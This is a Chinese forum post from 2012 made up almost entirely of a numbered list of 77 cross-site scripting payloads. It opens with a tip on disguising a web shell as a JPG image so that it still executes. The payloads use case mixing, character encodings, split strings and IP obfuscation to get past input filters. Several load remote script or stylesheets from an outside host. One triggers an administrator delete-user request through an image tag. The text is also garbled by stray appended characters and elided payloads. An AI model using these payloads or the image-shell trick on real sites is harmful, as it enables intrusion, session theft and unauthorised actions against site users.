跨站图片shell, ^5 U! T9 O' e' m! ]9 L8 c/ t
XSS跨站代码 <script>alert("")</script>7 ^& ?% }' Y* k! W% S
' C8 v! z1 `# ~2 ]
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马7 y# W' B4 a% \0 o
% p& J8 \- a5 l! q& O3 E
; g# w+ K0 K% I/ g. ^. H/ {
" m7 v! E- U6 |# r I7 |, U1)普通的XSS JavaScript注入1 k3 O3 F, U! @6 a! h
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( O( v, c" P( e' ^# W7 h
) `; n. g5 Z' {! a6 I+ b0 H9 i(2)IMG标签XSS使用JavaScript命令% u v$ G h1 e0 O8 B6 s
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& m; W) _; d$ f* C
1 t& R& j1 p |( t1 Z6 b(3)IMG标签无分号无引号: a$ l; N+ C& K9 {3 ?
<IMG SRC=javascript:alert(‘XSS’)>" X3 T u. F' S! s' l* d2 a
. C/ { B! X/ d(4)IMG标签大小写不敏感5 J) n" C2 G5 ?" g
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ C5 F4 m3 ^6 C8 E: ^; B0 R
( x, q) C' d0 E(5)HTML编码(必须有分号)
3 O, E+ h3 U3 U) t2 y<IMG SRC=javascript:alert(“XSS”)>: J9 U0 @) }2 y1 E; N% P- a
3 p& |' A6 ?, C0 i3 m' a(6)修正缺陷IMG标签
: z+ Z4 n: b0 ], W! l<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! d8 k4 c& [2 O b* o8 K
4 p* h, U5 z0 _0 F1 k
(7)formCharCode标签(计算器)2 r8 V9 a. Z. S1 e+ \7 c$ k8 s9 ?
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) `- u: d, W; j e! a% J
; M8 S d7 h6 Y: m1 B. d" ?) d1 u(8)UTF-8的Unicode编码(计算器)9 E; e$ h) Q5 S0 B! G3 k9 i) _
<IMG SRC=jav..省略..S')>2 O& B E K* u1 S5 i* E
. G6 ?. i N* e: [) N& f7 X(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ k. z5 T2 Y& p3 m- X% h4 ^
<IMG SRC=jav..省略..S')>
2 q u9 p \/ q- m- [. \8 W$ J, ], \' J$ ?' U1 U* N7 @& G8 w
(10)十六进制编码也是没有分号(计算器)
! ?* _% D3 E9 a<IMG SRC=java..省略..XSS')>
% z+ C% n/ b& E( o6 ?# _0 d$ ], R' n; s4 z( t" a9 g
(11)嵌入式标签,将Javascript分开9 a) L" L' b( ~8 H1 S1 N% T; w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 H3 }5 I7 e( E4 R9 o9 Y1 j& a8 o& {- S2 U( r
(12)嵌入式编码标签,将Javascript分开
8 O" c# f7 ~( |<IMG SRC=”jav ascript:alert(‘XSS’);”>) Q% e) J6 n; K+ M9 V8 N3 m
F7 `/ v+ C6 `6 i* J# G3 b T(13)嵌入式换行符
, d1 U1 r* ?, s" r<IMG SRC=”jav ascript:alert(‘XSS’);”>/ J# M& p1 f8 ^2 i3 F' @
7 U# q( v! }# S0 ?: G! O(14)嵌入式回车0 @3 Y. O( N3 O+ i4 C
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" c8 g5 g9 p+ T$ C3 [ t
/ Y3 y% O: [! z# B(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 S" ~0 b2 y& f& o: \/ P<IMG SRC=”javascript:alert(‘XSS‘)”>) P2 R6 e- ~; V' u
7 H( \$ {4 U% B6 l6 Y(16)解决限制字符(要求同页面)$ b9 Z+ }7 t, k' V7 f& q0 C2 g% d4 O
<script>z=’document.’</script>: i X3 s* E; F9 h& Q. X9 b8 r; n
<script>z=z+’write(“‘</script>" b$ M( S4 y$ n+ P7 M t0 l) ~* O
<script>z=z+’<script’</script>
) I! Z' T1 c' {8 [2 I# r<script>z=z+’ src=ht’</script>
5 W g H" k, V: d; r+ o<script>z=z+’tp://ww’</script>; R' m* H* K; D7 |. J9 y/ f1 |3 z
<script>z=z+’w.shell’</script>
8 o7 I- k' c" \3 z6 U2 C4 R<script>z=z+’.net/1.’</script>
$ E: m! w: I, `7 P& K" v<script>z=z+’js></sc’</script>0 S2 n3 \' r2 \ q4 G) n0 Q& |
<script>z=z+’ript>”)’</script>
( j, G+ m: b" v% z9 [5 M<script>eval_r(z)</script>
' ?3 x1 M# i$ b% B, i0 }9 R, j6 f4 F* w2 b/ x3 {7 ^4 N
(17)空字符
; k5 M2 A" t( Vperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, m5 s( n( ]; S z6 Z- E/ C8 \
; j5 G' C$ V9 j2 |3 [$ ?* h(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
) n) `# Z/ O2 yperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
' s ^' ~+ c: P
6 U i# H' b, ]) s& D(19)Spaces和meta前的IMG标签
, C$ p# e6 z0 K' f! o/ H, W<IMG SRC=” javascript:alert(‘XSS’);”>5 g9 q) K) W' N: t1 S8 h
+ i; x6 z, I; ?: s1 `3 M) d! D! z
(20)Non-alpha-non-digit XSS$ a6 S& X# N1 R' [/ y
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 J) v4 Z8 g! p; F
7 Q8 o' i" v& @. h
(21)Non-alpha-non-digit XSS to 2/ y6 f! g1 j! A! R# f
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
1 V) v2 Q* n3 y8 B4 n& W7 l3 @- t6 h8 l1 P: V! _ k1 z
(22)Non-alpha-non-digit XSS to 3
% B5 h) \+ q7 y% ?0 f<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 I+ I7 Y. ~( |/ P: {4 z8 B/ F1 t
3 S) X x5 y4 M(23)双开括号# Z' ]/ J# x- B8 |" X% c5 f0 n
<<SCRIPT>alert(“XSS”);//<</SCRIPT>* e6 i, f& x6 m* D% l7 g% h
! N w4 c# b% P1 f8 e' `(24)无结束脚本标记(仅火狐等浏览器)" h/ D5 m/ E. p
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B># I* b/ _5 H, Q. ~8 E1 C
6 o7 W& t! o' t3 S+ J7 o; E(25)无结束脚本标记23 d7 F: [, d" a( z0 j# d" V4 ~
<SCRIPT SRC=//3w.org/XSS/xss.js>
, x6 G( l2 h( d5 |
- T! Q& R& }3 x3 L1 Z(26)半开的HTML/JavaScript XSS
( N7 S, P; S M1 f$ d' P<IMG SRC=”javascript:alert(‘XSS’)”7 U+ V( c; G$ e$ J: B
. x$ Z. b: l/ }# I4 f8 i: n) e
(27)双开角括号# o5 y2 j3 D6 G/ r0 h9 R+ v
<iframe src=http://3w.org/XSS.html <
1 ?; |& L4 ~8 S% i" d1 x( |/ @" `6 k; J, f$ U$ d! a3 {
(28)无单引号 双引号 分号
8 Q# }( p: q7 q. @7 z<SCRIPT>a=/XSS/
: T+ M0 V+ l5 }7 Y1 palert(a.source)</SCRIPT>
9 g- M- A2 {; z0 o( f3 k& Z+ C
`0 l* P! m3 x(29)换码过滤的JavaScript: p+ ?- d; G# q1 s/ ~" B7 x, {+ f
\”;alert(‘XSS’);//
4 s3 ^ m- @# B' @5 J9 p5 x; _& J s m6 M
(30)结束Title标签; I& `( H& L9 i* k( T
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( B7 @2 `' N' U: P' P4 @
3 }! F% n( U# t; k+ r3 n$ U" D(31)Input Image
- J; N2 g& P7 q) ~<INPUT SRC=”javascript:alert(‘XSS’);”>1 _! @% i7 L3 q) V+ H5 N
5 P8 T# j" _3 T(32)BODY Image
; ~4 A( Y# A y* A1 ^<BODY BACKGROUND=”javascript:alert(‘XSS’)”>4 A s5 P. s1 |9 y# N& b" E, T" b
5 j3 n/ u* p; }3 R* \0 S2 e(33)BODY标签, _1 B4 g! y- V* s/ |
<BODY(‘XSS’)>' J+ m2 ^# u; N2 j# B! p# m' J5 d. B
! N6 x d+ F- _+ @(34)IMG Dynsrc6 |; O* m j9 X8 q
<IMG DYNSRC=”javascript:alert(‘XSS’)”>% N1 K# c: q3 R( F: p
# x! K% \: R# ~, [( Z3 U4 a% ~- `
(35)IMG Lowsrc
9 [8 L$ N0 l* S x$ l# u<IMG LOWSRC=”javascript:alert(‘XSS’)”>2 q, Y; U. k% M# U# n
6 ~6 C2 m" M& E! g. U# y* ]
(36)BGSOUND
$ O7 ~% _- L: I) ^+ P<BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ N" t. d8 h+ \: f6 G3 U+ c+ m+ |) K' L* t/ `/ H+ f$ o# ?
(37)STYLE sheet
5 }: |5 w1 u6 ^4 L9 L<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>( t7 q" G" [! r2 w# U5 t
2 _4 t7 G* }7 v1 m0 W% Q(38)远程样式表
1 r) ^* M3 S; S% d: O3 {, `<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 u+ W2 t: I- _6 w* b
" g& ]# H4 x i" Q$ b4 R3 E$ q
(39)List-style-image(列表式)( R& u1 z# K8 p$ @
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 V; U; N9 ~- C! s
& h, k1 J3 A Z/ o% k) Q. M+ A `
(40)IMG VBscript0 b+ X: b; ~6 H' a6 c" e7 G1 b
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS3 E/ S F F/ @
3 q5 W$ F3 k9 w8 b(41)META链接url C+ P% M" S N: H
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>' ~/ z9 H5 H$ P, {8 v
G5 _0 k. e5 T8 `0 q+ {' ?
(42)Iframe
2 l3 F3 q3 d: Q+ ]1 N<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, G& q3 j6 B$ W# I) t, x(43)Frame" Z9 ~6 t" u5 \# \; A
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
7 K" |1 i, H- f8 p' r- A
( k# |8 y" F+ V' E) `- e7 J(44)Table
" J: u0 [# O0 s, O<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
0 S6 ^! P0 K$ S
2 s9 B# j5 h. [- q- l- _(45)TD4 h2 Z" ~7 S# ]6 A
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>) D/ ^3 D# K3 K4 E
0 w b" W a. S+ `4 R% S(46)DIV background-image* O# y6 b$ Z' k! S( O& \
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; } w" E, ?. H" a
2 I; ~) z* r4 e$ l% F+ v(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
6 h0 W; x: ]4 T5 }% K* K7 l1 M) J7 [<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
3 e9 j1 Q0 ?6 U8 e2 |
$ E" p! U9 R& ]7 P* A9 H, k+ x8 T; @(48)DIV expression6 V& Q) [4 g* w4 i' m9 P( \6 d1 s
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>' t! i0 A3 M+ B* B
& O, Y5 L5 \4 b. H u(49)STYLE属性分拆表达
8 [1 D8 {6 m* N$ Q: s' z4 F1 I0 o<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ {/ e' I4 C; G
. Q; C9 K+ ~. H7 B
(50)匿名STYLE(组成:开角号和一个字母开头)
( w4 L9 `4 I* V) f) `% m- T% t<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; z: L+ e2 t4 A6 }4 |7 A( @% ~5 z
4 O; u7 t. [+ y1 M(51)STYLE background-image
1 x% d+ z6 @' s3 x& J) u% A: u<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
+ }/ p# p0 N+ I( ?3 x$ ]$ T' y; K4 H
6 ?$ Q+ c' O* @& ?(52)IMG STYLE方式; B9 K3 r+ b$ a1 m. ?9 R* q
exppression(alert(“XSS”))’>8 ~5 O- g2 _! M) ]
3 d. a7 ` A. z/ T(53)STYLE background
# A# X, X1 C- ]( J8 n$ {) j<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>! O5 n' N6 q2 s2 {
( B" i" X; J4 }3 F' q: e(54)BASE3 e7 V0 ?6 l& G/ z6 p- Q& I( T
<BASE HREF=”javascript:alert(‘XSS’);//”>4 f) a# R. T$ _
% z4 a0 Y: V8 i5 {6 `8 o( s
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
1 Q& C( P8 a" d, Z<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
; ~. H! y! M- ~- T$ F+ y' K' r; h; S" q6 T5 h2 J4 f, {
(56)在flash中使用ActionScrpt可以混进你XSS的代码
E' c) k& w( k+ j3 ^" [* Ea=”get”;( [) h7 O7 P" K8 ]& V! K5 R( ^" ^3 ]
b=”URL(\”";
' Q# z& N% e0 |7 L \c=”javascript:”;
1 q( H4 r( b! E; p, \! f+ z: Q; Xd=”alert(‘XSS’);\”)”;7 X9 H8 i6 s3 q' E! N
eval_r(a+b+c+d);8 k9 {0 X0 z+ i! P* m
; N) w! k' D* ] Q$ W(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
# s7 c+ r" ~$ m; b<HTML xmlns:xss>
' ?8 b7 d5 l) U9 E; d3 R% ?+ q<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>& D E2 j- i W! y1 n: h) O% a
<xss:xss>XSS</xss:xss>
; \# y; p' @ H# }</HTML>
- f- x* ~4 A6 S. }5 G# C
B9 \7 [6 x" P8 t(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
" x' ~6 b+ a/ j/ l<SCRIPT SRC=””></SCRIPT>
4 _/ a8 b4 r+ X% A1 t$ R m: A
2 @! G4 b4 ~# N5 D" |(59)IMG嵌入式命令,可执行任意命令
b1 y! W$ |$ c. W/ Q4 K/ t- o<IMG SRC=”http://www.XXX.com/a.php?a=b”>
; j! L3 ^" a! z U0 b: \& s
% D( K9 Q% @ @. ]6 _$ v7 N3 P(60)IMG嵌入式命令(a.jpg在同服务器)
9 _$ d' H1 a' [+ IRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser4 P P+ ~9 _+ P2 d8 [
: ^2 P, I q( v: `+ V6 c* K; o(61)绕符号过滤4 S, J: M2 H5 v. o
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>; C# z/ N7 y( T' `# u. K4 S
' n+ C+ f6 w+ c( S! Z# }8 F, n
(62)
! ^% d$ h& W6 X+ D% H. k<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>8 P: t- z; f. Y; A- }: ~) P2 B
/ Z2 S% M9 @2 r. U' h/ h- r(63)
/ R C. i: C2 w2 F; f% l. \3 P5 O/ B+ B<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>2 p, F( `+ w7 a) s* i4 X9 \0 c
3 p) E0 z$ D5 B7 n9 H3 ?(64)
$ ]. E( ^% j& C9 g$ e$ O<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>" d- B- t. e% o+ w' e' r' t* L+ K
1 L. i6 k2 C& E5 i+ q
(65)' ^& `0 R9 E1 E/ |" [
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>( i3 L1 Y, y, e: g4 r! L( a0 z( Z! y
9 D* V: Q9 z9 \( [(66)6 t* ^" X5 E# D3 X; Y9 P+ D
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>7 y4 ?, M/ [# E. \$ m
& s) l* P/ I" ^- w. s$ C; A/ f2 m(67)' v& ^: B' ?4 q0 `4 B
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>5 ?% z: F) f* ^& F* c
- m8 ^4 d. _6 ]% {(68)URL绕行7 [. R% C3 I4 T" t8 J' j J
<A HREF=”http://127.0.0.1/”>XSS</A>
; e+ X) X& \. n# s& p7 z0 h' s# _' O; P) z2 L9 N: ]
(69)URL编码
' {2 n- n$ H/ T. ~$ t<A HREF=”http://3w.org”>XSS</A>1 P9 k! m$ G% I( ], b
9 m. _9 x3 }. E, y* i
(70)IP十进制; x- M3 K( M1 H' H) u; F$ Y3 I
<A HREF=”http://3232235521″>XSS</A>
; n, R0 [- r, D- h7 e0 O+ t# f! T5 Q- _0 s* U# h
(71)IP十六进制
2 g9 t! @' F h" l0 v {<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>2 R { m+ W! ]0 s9 v6 R2 p
B0 q: f L$ c4 `& s5 A" G(72)IP八进制* D, E& _4 O5 q, {: ]
<A HREF=”http://0300.0250.0000.0001″>XSS</A>; Q8 c4 Z/ }: ?6 e# a* X C( K
I" h4 T6 V" G( q& m$ B) ^3 z(73)混合编码/ u$ E6 U) u* R; g+ P" N6 k
<A HREF=”h
; Q) {1 ^! g( M, D @$ C% y3 ltt p://6 6.000146.0×7.147/”">XSS</A>+ E, j) }& G6 B) @2 z Y+ D% F/ q
: g% x: k/ n1 H* v( F& j4 S1 ?9 C(74)节省[http:]8 G+ p: ^9 ~2 L! T+ x' @- G! Z* _
<A HREF=”//www.google.com/”>XSS</A>/ Y4 A* \/ |" ?0 E Y0 F
7 U9 f% Y: _9 e4 }/ p2 c(75)节省[www]
. a* |, u3 x1 M8 K" K7 x<A HREF=”http://google.com/”>XSS</A>
: l$ R2 e) v+ X5 I9 G# q: s1 v/ N3 f& q$ @! p4 x
(76)绝对点绝对DNS9 [* i6 R2 h" s* R& [. V
<A HREF=”http://www.google.com./”>XSS</A>8 i$ }/ s7 Y$ F4 X2 e
0 ^" h! s, s8 l s' c7 b(77)javascript链接8 [5 e$ e8 J, l( ^
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>6 r4 p4 {. q" f1 }
|
发表于 2012-9-13 17:04:56
收藏
支持
反对